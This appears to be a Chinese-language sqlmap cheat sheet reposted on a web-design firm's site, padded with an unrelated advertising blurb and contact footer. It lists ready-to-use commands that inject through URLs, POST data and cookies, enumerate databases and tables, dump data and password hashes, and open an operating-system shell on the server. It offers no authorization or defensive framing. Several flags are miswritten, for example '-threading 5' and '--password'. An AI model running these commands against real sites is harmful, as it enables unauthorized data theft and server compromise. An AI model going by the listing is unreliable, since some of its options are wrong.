sqlmap命令

SQLMAP

创新互联是一家专注于成都网站制作、成都网站建设与策划设计,义县网站建设哪家好?创新互联做网站,专注于网站建设10年,网设计领域的专业建站公司;建站业务涵盖:义县等地区。义县做网站价格咨询:028-86922220

GET   方式的注入  sqlmap.py -u "URL"

POST  方式的注入  sqlmap.py -u "URL" --data "POST参数=POST数值"

COOKIE 方式的注入  sqlmap.py -u "URL" --cookie "cookies 值"

爆数据库名(cookie根据实际的情况)  sqlmap.py -u "URL" [--cookie "cookies 值"] --dbs

爆目标数据库中的表     sqlmap.py -u "URL" [--cookie "cookies 值"] -D 数据库名 --tables

爆目标数据表字段  sqlmap.py -u "URL" [--cookie "cookies 值"] -D 数据库名 -T 表名 --columns

导出目标字段的数据 sqlmap.py  -u "URL"  [--cookie "cookies 值"] -D 数据库名 -T 表名 -C 要导出数据的字段名,多个字段用逗号分隔 --dump

爆出目标库有多少数据    sqlmap.py -u "URL" [--cookie "cookies 值"] -D 数据库名 --count

检测当前用户        sqlmap.py -u "URL" [--cookie "cookies 值"] --current-user

检测当前用户是否管理员  sqlmap.py -u "URL" [--cookie "cookies 值"] --is-dba

检测数据库用户       sqlmap.py -u "URL" [--cookie "cookies 值"]  --user -v 0

检测数据库用户密码    sqlmap.py -u "URL" [--cookie "cookies 值"]  --password -v 0

检测当前数据库       sqlmap.py -u "URL" [--cookie "cookies 值"] --current-db

多线程            -threading 5

如果是管理员,我们可以写Shell

操作系统Shell写入 

sqlmap.py -u "URL" [--cookie "cookies 值"] --os-shell


标题名称:sqlmap命令
本文来源:http://csdahua.cn/article/ggejeh.html
扫二维码与项目经理沟通

我们在微信上24小时期待你的声音

解答本文疑问/技术咨询/运营咨询/技术建议/互联网交流